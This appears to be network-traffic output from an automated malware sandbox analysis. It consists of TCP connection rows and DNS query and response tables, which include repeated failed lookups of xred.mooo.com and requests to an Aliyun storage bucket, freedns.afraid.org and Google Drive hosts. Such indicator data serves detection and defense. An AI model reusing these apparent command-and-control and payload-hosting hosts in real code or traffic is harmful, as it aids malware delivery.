                                                                                                                                                                    Dec 30, 2024 04:59:51.403821945 CET44349966142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:51.403897047 CET49966443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:51.404154062 CET49966443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:51.404162884 CET44349966142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:51.404284000 CET49966443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:51.404289007 CET44349966142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:51.744075060 CET44349965142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:51.744118929 CET44349965142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:51.744182110 CET49965443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:51.744256973 CET49965443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:51.744601965 CET49965443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:51.744612932 CET44349965142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:51.745246887 CET49967443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:51.745263100 CET44349967142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:51.745357990 CET49968443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:51.745384932 CET44349968142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:51.745392084 CET49967443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:51.745595932 CET49967443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:51.745609999 CET44349967142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:51.745625973 CET49968443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:51.745908976 CET49968443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:51.745920897 CET44349968142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:51.780174971 CET44349966142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:51.780294895 CET49966443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:51.780566931 CET49966443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:51.780606985 CET44349966142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:51.780762911 CET44349966142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:51.780834913 CET49966443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.792428017 CET44349972142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.792437077 CET49972443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.792804956 CET49981443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.792823076 CET49972443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.792893887 CET44349981142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.796932936 CET49981443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.797286034 CET49981443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.797326088 CET44349981142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.988748074 CET44349976142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.988792896 CET44349976142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.988818884 CET49976443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.988867998 CET44349976142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.988900900 CET49976443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.989015102 CET49976443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.989171982 CET44349976142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.989207029 CET44349976142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.989228964 CET49976443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.989253998 CET49976443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.989449024 CET49976443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.989476919 CET44349976142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.989814043 CET49982443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.989835978 CET44349982142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.989897013 CET49982443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.990076065 CET49982443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.990089893 CET44349982142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.424972057 CET44349979142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.425029039 CET49979443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.425400972 CET49979443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.425410986 CET44349979142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.427198887 CET49979443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.427202940 CET44349979142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.432807922 CET44349980142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.432862997 CET49980443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:54.433190107 CET49980443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:54.433198929 CET44349980142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.436206102 CET49980443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:54.436212063 CET44349980142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.461256027 CET44349981142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.461343050 CET49981443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.461673975 CET49981443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.461695910 CET44349981142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.461873055 CET49981443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.461886883 CET44349981142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.637492895 CET44349982142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.637697935 CET49982443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:54.638190985 CET49982443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:54.638196945 CET44349982142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.638328075 CET49982443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:54.638333082 CET44349982142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.766140938 CET49979443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.766144991 CET49980443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:54.766144991 CET49982443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:54.766153097 CET49981443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.766787052 CET49983443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.766858101 CET44349983142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.766942024 CET49983443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.767561913 CET49983443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.767595053 CET44349983142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.768696070 CET49984443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.768723965 CET44349984142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.768815041 CET49984443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.769020081 CET49984443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.769046068 CET44349984142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.376641035 CET44349984142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.376933098 CET49984443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:55.381505966 CET49984443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:55.381539106 CET44349984142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.385505915 CET44349983142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.386219978 CET49983443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:55.386279106 CET49984443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:55.386296034 CET44349984142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.420150042 CET49983443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:55.420186996 CET44349983142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.420325041 CET49983443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:55.420337915 CET44349983142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.834541082 CET44349984142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.834872961 CET49984443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:55.835455894 CET44349984142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.835505962 CET44349984142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.835558891 CET49984443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:55.859505892 CET44349983142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.859570980 CET49983443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:55.859606028 CET44349983142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.859658003 CET49983443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:55.860140085 CET44349983142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.860167027 CET44349983142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.860218048 CET49983443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:06.391654968 CET49983443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:06.391694069 CET44349983142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:06.391928911 CET49984443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:06.391949892 CET44349984142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:06.391974926 CET49984443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:06.392008066 CET49984443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:06.395895958 CET50045443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:06.395929098 CET44350045142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:06.396090984 CET50046443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:06.396111012 CET50045443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:06.396162987 CET44350046142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:06.396231890 CET50046443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:06.396960974 CET50047443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:06.396969080 CET44350047142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:06.397188902 CET50048443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:06.397211075 CET44350048142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:06.397223949 CET50047443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:06.398309946 CET50046443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:06.398344994 CET44350046142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:06.398354053 CET50048443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:06.398509979 CET50045443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:06.398523092 CET44350045142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:06.398683071 CET50047443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:06.398694038 CET44350047142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:06.398742914 CET50048443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:06.398757935 CET44350048142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:06.998791933 CET44350046142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:06.999383926 CET50046443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:07.000771046 CET44350047142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:07.001683950 CET44350048142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:07.001745939 CET50047443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:07.001750946 CET50048443192.168.2.4142.250.181.238
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                    Dec 30, 2024 05:00:43.458865881 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:43.577306986 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:00:45.650002003 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:00:48.266361952 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:48.623589039 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:48.772195101 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:49.102538109 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:49.359966040 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:00:49.681196928 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:49.687998056 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:50.018275976 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:50.125623941 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:50.470223904 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:50.563026905 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:52.859961987 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:00:53.195503950 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:53.297884941 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:00:53.618940115 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:53.625582933 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:53.955815077 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:53.965677977 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:00:57.125843048 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:59.750763893 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:01:02.813150883 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:01:05.984992027 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:01:06.325289965 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:06.860398054 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:01:09.703912020 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:01:12.000921011 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:01:14.081176043 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:01:16.594532013 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:01:19.767782927 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:01:22.173166037 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:01:24.579376936 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:01:24.901624918 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:24.907249928 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:01:27.422727108 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:01:29.727037907 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:01:32.016411066 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:01:34.094774008 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:01:36.391892910 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:01:39.016311884 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:01:39.344160080 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:39.344571114 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:01:41.425254107 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:01:44.047807932 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:01:44.371907949 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:02:56.344826937 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:02:56.677130938 CET80100041.192.136.132192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 30, 2024 04:59:01.780667067 CET | 192.168.2.4 | 1.1.1.1 | 0x4679 | Standard query (0) | bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:07.037955999 CET | 192.168.2.4 | 1.1.1.1 | 0xd19d | Standard query (0) | docs.google.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:07.911679983 CET | 192.168.2.4 | 1.1.1.1 | 0xfec8 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:08.041115046 CET | 192.168.2.4 | 1.1.1.1 | 0xda62 | Standard query (0) | freedns.afraid.org | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:08.135755062 CET | 192.168.2.4 | 1.1.1.1 | 0x4f59 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:12.693552017 CET | 192.168.2.4 | 1.1.1.1 | 0xbdcc | Standard query (0) | s.360.cn | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:13.233557940 CET | 192.168.2.4 | 1.1.1.1 | 0xe790 | Standard query (0) | st.p.360.cn | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:13.331015110 CET | 192.168.2.4 | 1.1.1.1 | 0x1ec7 | Standard query (0) | tr.p.360.cn | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:13.332196951 CET | 192.168.2.4 | 1.1.1.1 | 0x38e4 | Standard query (0) | agt.p.360.cn | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:14.349760056 CET | 192.168.2.4 | 1.1.1.1 | 0x1eb4 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:17.651715994 CET | 192.168.2.4 | 1.1.1.1 | 0xc5dc | Standard query (0) | agd.p.360.cn | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:17.653306961 CET | 192.168.2.4 | 1.1.1.1 | 0xb804 | Standard query (0) | pinst.360.cn | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:18.876960993 CET | 192.168.2.4 | 1.1.1.1 | 0xeef2 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:24.563920975 CET | 192.168.2.4 | 1.1.1.1 | 0x4113 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:31.360856056 CET | 192.168.2.4 | 1.1.1.1 | 0x4b05 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:35.892323971 CET | 192.168.2.4 | 1.1.1.1 | 0xef30 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:41.564086914 CET | 192.168.2.4 | 1.1.1.1 | 0x69b7 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:48.361255884 CET | 192.168.2.4 | 1.1.1.1 | 0x99f3 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:52.942694902 CET | 192.168.2.4 | 1.1.1.1 | 0x11e0 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 05:00:06.395620108 CET | 192.168.2.4 | 1.1.1.1 | 0x5764 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 30, 2024 04:59:01.970598936 CET | 1.1.1.1 | 192.168.2.4 | 0x4679 | No error (0) | bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com |  | 47.79.48.211 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:07.044559956 CET | 1.1.1.1 | 192.168.2.4 | 0xd19d | No error (0) | docs.google.com |  | 142.250.181.238 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:08.038033962 CET | 1.1.1.1 | 192.168.2.4 | 0xfec8 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:08.050077915 CET | 1.1.1.1 | 192.168.2.4 | 0xda62 | No error (0) | freedns.afraid.org |  | 69.42.215.252 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:08.142846107 CET | 1.1.1.1 | 192.168.2.4 | 0x4f59 | No error (0) | drive.usercontent.google.com |  | 142.250.186.129 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:12.700465918 CET | 1.1.1.1 | 192.168.2.4 | 0xbdcc | No error (0) | s.360.cn |  | 180.163.251.230 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:12.700465918 CET | 1.1.1.1 | 192.168.2.4 | 0xbdcc | No error (0) | s.360.cn |  | 180.163.251.231 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:12.700465918 CET | 1.1.1.1 | 192.168.2.4 | 0xbdcc | No error (0) | s.360.cn |  | 101.198.2.147 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:12.700465918 CET | 1.1.1.1 | 192.168.2.4 | 0xbdcc | No error (0) | s.360.cn |  | 171.8.167.89 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:13.240827084 CET | 1.1.1.1 | 192.168.2.4 | 0xe790 | No error (0) | st.p.360.cn |  | 1.192.136.170 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:13.338097095 CET | 1.1.1.1 | 192.168.2.4 | 0x1ec7 | No error (0) | tr.p.360.cn |  | 1.192.136.132 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:13.338097095 CET | 1.1.1.1 | 192.168.2.4 | 0x1ec7 | No error (0) | tr.p.360.cn |  | 1.192.136.135 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:13.338097095 CET | 1.1.1.1 | 192.168.2.4 | 0x1ec7 | No error (0) | tr.p.360.cn |  | 1.192.136.134 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:13.338097095 CET | 1.1.1.1 | 192.168.2.4 | 0x1ec7 | No error (0) | tr.p.360.cn |  | 1.192.136.133 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:13.545320034 CET | 1.1.1.1 | 192.168.2.4 | 0x38e4 | No error (0) | agt.p.360.cn |  | 1.192.136.132 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:13.545320034 CET | 1.1.1.1 | 192.168.2.4 | 0x38e4 | No error (0) | agt.p.360.cn |  | 1.192.136.133 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:14.357651949 CET | 1.1.1.1 | 192.168.2.4 | 0x1eb4 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:17.958836079 CET | 1.1.1.1 | 192.168.2.4 | 0xc5dc | No error (0) | agd.p.360.cn | agd2.p.360.cn |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 30, 2024 04:59:17.958836079 CET | 1.1.1.1 | 192.168.2.4 | 0xc5dc | No error (0) | agd2.p.360.cn |  | 1.192.194.215 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:17.958836079 CET | 1.1.1.1 | 192.168.2.4 | 0xc5dc | No error (0) | agd2.p.360.cn |  | 1.192.194.232 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:18.351447105 CET | 1.1.1.1 | 192.168.2.4 | 0xb804 | No error (0) | pinst.360.cn | softm.update.360safe.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 30, 2024 04:59:18.351447105 CET | 1.1.1.1 | 192.168.2.4 | 0xb804 | No error (0) | softm.update.360safe.com | seupdate.360qhcdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 30, 2024 04:59:18.351447105 CET | 1.1.1.1 | 192.168.2.4 | 0xb804 | No error (0) | seupdate.360qhcdn.com |  | 39.156.85.231 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:18.351447105 CET | 1.1.1.1 | 192.168.2.4 | 0xb804 | No error (0) | seupdate.360qhcdn.com |  | 39.156.85.200 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:18.351447105 CET | 1.1.1.1 | 192.168.2.4 | 0xb804 | No error (0) | seupdate.360qhcdn.com |  | 39.156.85.201 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:18.883945942 CET | 1.1.1.1 | 192.168.2.4 | 0xeef2 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:24.571327925 CET | 1.1.1.1 | 192.168.2.4 | 0x4113 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:31.367862940 CET | 1.1.1.1 | 192.168.2.4 | 0x4b05 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:35.899194956 CET | 1.1.1.1 | 192.168.2.4 | 0xef30 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:41.570924044 CET | 1.1.1.1 | 192.168.2.4 | 0x69b7 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:48.368267059 CET | 1.1.1.1 | 192.168.2.4 | 0x99f3 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 04:59:52.950088978 CET | 1.1.1.1 | 192.168.2.4 | 0x11e0 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
